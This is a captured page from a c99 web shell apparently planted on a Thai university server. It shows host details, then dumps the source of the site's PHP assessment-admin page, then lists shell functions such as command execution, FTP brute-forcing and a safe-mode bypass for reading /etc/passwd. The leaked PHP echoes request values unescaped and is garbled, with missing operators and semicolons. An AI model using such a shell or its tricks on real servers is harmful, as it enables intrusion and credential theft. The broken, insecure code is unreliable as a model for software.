!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     programTBTmp.php (6.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "../../class/clsDB.php";
include_once 
"../../class/clsConnection.php";
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../class/clsReg_Program.php";
include_once 
"../class/clsHoldProgramTmp.php";

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);
$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oProg = new Program($oCR);
$oHPT = new HoldProgramTmp($oCA);

//echo "<pre>";
//print_r($stdYearAss);
//echo "<pre>";

doCheckAll();
if(
$method=="add"){
        for(
$i=0$i<$cnt$i++){    
            for(
$j=0$j$cnt2$j++){
            
$programId "programId_".$i;
            
$stdYearAss "stdYearAss_".$i;
            
//echo "<br> programId = ".${$programId};
            //echo "   stdYearAss = ".${"stdYearAss_".$i}[$j];
    
            //if(${$programId} && ${"stdYearAss_".$i}[$j] > 0) {
            
if(${$programId} && ${$stdYearAss}[$j] > 0) {    
                
$oHPT->AddNew();
                
$oHPT->holdPid=$holdPid;
                
$oHPT->programId=${$programId};
                
$oHPT->stdYearAss=${"stdYearAss_".$i}[$j];
                
$oHPT->Save();
                } 
            } 
// end for j
        
// end for i
?>
    <script language="javascript1.2">
    window.opener.location.href="addDefineProgram.php?assid=<?php echo $assid;?>&acadYear=<?php echo $acadYear;?>&semester=<?php echo $semester;?>&startDate=<?php echo $startDate;?>&endDate=<?php echo $endDate;?>&closeDate=<?php echo $closeDate;?>";
    window.close();
    </script>
<?php    
// end if method add
?>
<script language="javascript1.2">
    function checknow(el,stdYearAss){
//alert(stdYearAss);
//alert(el.checked);
        var fname = el.form;
        var curline = fname.elements[stdYearAss];
        if(el.checked){
            for(var i = 0; i<curline.length; i++){                
                curline[i].disabled = false;
            }
        }else{
            for(var i = 0; i<curline.length; i++){
                curline[i].checked = false;
                curline[i].disabled = true;
            }
        }
    }
</script>
<html>
<head>
<title>ตารางหลักสูตรที่เปิดสอน</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<style>
<!--
A:link {text-decoration: none }
A:visited {text-decoration: none}
A:hover {text-decoration: none; font-weight: underline}
-->
</style>
<?
    
//$acadYear_1 = $GLOBALS["ACADYEAR"];
    //$semester_1 = $GLOBALS["SEMESTER"];

    
$oSse = new SysSemesterDes($oCR);
    
$oSse->SearchByKey($semester_1);
    
$oSse->GetRecord();
?>
</head>
<body bgcolor="#FFFFFF">
<form name="pc" action="<?php echo $PHP_SELF;?>" method="post" onSubmit=""><br>
  <table width="97%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="silver">
    <tr bgcolor="#0066CC"> 
      <td width="7%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>เลือก</b></font></td>
      <td width="10%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>รหัส<br>หลักสูตร</b></font></td>
      <td width="51%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>ชื่อหลักสูตร</b></font></td>
      <td width="32%" align="center"><font face="Microsoft Sans Serif" size="2" color="#FFFFFF"><b>ชั้นปี</b></font></td>
    </tr>
    <?
        $i 
0;
        
$countTmp 0;
        
$oProg->SearchByProgramStatusY();
        while(
$oProg->GetRecord()){
            
$oHPT->SearchByProgramId($oProg->programId);
            if(
$oHPT->GetRecord() == '0'){
        
?>
    <tr> 
      <td align="center" bgcolor="#FFFFFF"><input type="checkbox" name="programId_<? echo $i ?>" value="<?php echo $oProg->programId;?>" onClick = "checknow(this,'stdYearAss_<? echo $i ?>[]');"></td>
      <td align="center" bgcolor="#FFFFFF">
            <? if($oProg->programAbbr != ""){ 
                        echo 
$oProg->programAbbr;
                    }else{
                        echo 
"<img src = \"../picture/warn.png\" border = \"0\">";
                    }
            
?> <? //echo $oProg->programId ?> </td>
      <td bgcolor="#FFFFFF"><font size="2" face="Microsoft Sans Serif"><? echo $oProg->programName ?></font> 
      </td>
      <td bgcolor="#FFFFFF">
            <?
             
for($j=0$j<$oProg->studyYear$j++) { ?>
        <input type="checkbox" name="stdYearAss_<? echo $i ?>[]" value="<?php echo $j+1?>" disabled>ปี<?php echo $j+1?>
            <?     }
             
?>
        </td>
    </tr>
    <?
            
} else {// end if oHP
    
?>
    <tr> 
      <td height="22" align="center" bgcolor ="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
        <img src="../picture/checked.gif" align="absmiddle" border="0"></td>
      <td height="22"  align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
        <? if($oProg->programAbbr != ""){ 
                        echo 
$oProg->programAbbr;
                    }else{
                        echo 
"<img src = \"../picture/warn.png\" border = \"0\">";
                    }
            
?>
        <? //echo $oProg->programId ?>
      </td>
      <td height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"><font size="2" ><?php echo $oProg->programName;?></font> 
      </td>
      <td height="22" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_5"];?>"> 
        <?
             
for($j=0$j<$oProg->studyYear$j++) {
                 
$oHPT->SearchByProgramIdStdYearAss($oProg->programId,$j+1);
                 if(
$oHPT->GetRecord() == 1){
              
?>
        <img src="../picture/checked.gif" align="absmiddle" border="0">ปี<?php echo $j+1?> 
        <?     }else{  ?>
        <img src="../picture/check.gif" align="absmiddle" border="0">ปี<?php echo $j+1?> 
        <?    }
            } 
// end for
             
?>
      </td>
    </tr>
    <?php
                $countTmp
++;
            } 
// end else oHP
            
$i++;            
        }
        
$countClass $i;    
    
?>
  </table>
  <table width="97%" border="0" align="center" cellpadding="1" cellspacing="0" bgcolor="silver">
    <tr> 
      <td width="76%"> 
        <input type="hidden" name="cnt" value="<?php echo $i;?>">
        <input type="hidden" name="cnt2" value="<?php echo $j;?>">
        <input type="hidden" name="method" value="add"> 
        <input type="hidden" name="assid" value="<?php echo $assid;?>"> 
        <input type="hidden" name="acadYear" value="<?php echo $acadYear;?>"> 
        <input type="hidden" name="semester" value="<?php echo $semester;?>"> 
        <input type="hidden" name="startDate" value="<?php echo $startDate;?>"> 
        <input type="hidden" name="endDate" value="<?php echo $endDate;?>">
        <input type="hidden" name="closeDate" value="<?php echo $closeDate;?>"></td>
      <td width="24%" align="right"><font size="2">เลือกแล้ว <?php echo $countTmp ?> 
        รายการ <br>
        จากทั้งหมด <?php echo $countClass?>รายการ</font></td>
    </tr>
    <tr> 
      <td colspan="2" align="center" bgcolor="#FFFFFF"><br> <input type="submit" name="add" value="บันทึก"> 
      </td>
    </tr>
    <tr> 
      <td align="center" colspan="2" bgcolor="#FFFFFF"><a href="#" onClick="window.close()"><font size="2" face="Microsoft Sans Serif">[ปิดหน้าต่าง]</font></a></td>
    </tr>
    <tr>
      <td align="center" colspan="2" bgcolor="#FFFFFF">&nbsp;</td>
    </tr>
  </table>
</form>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0159 ]--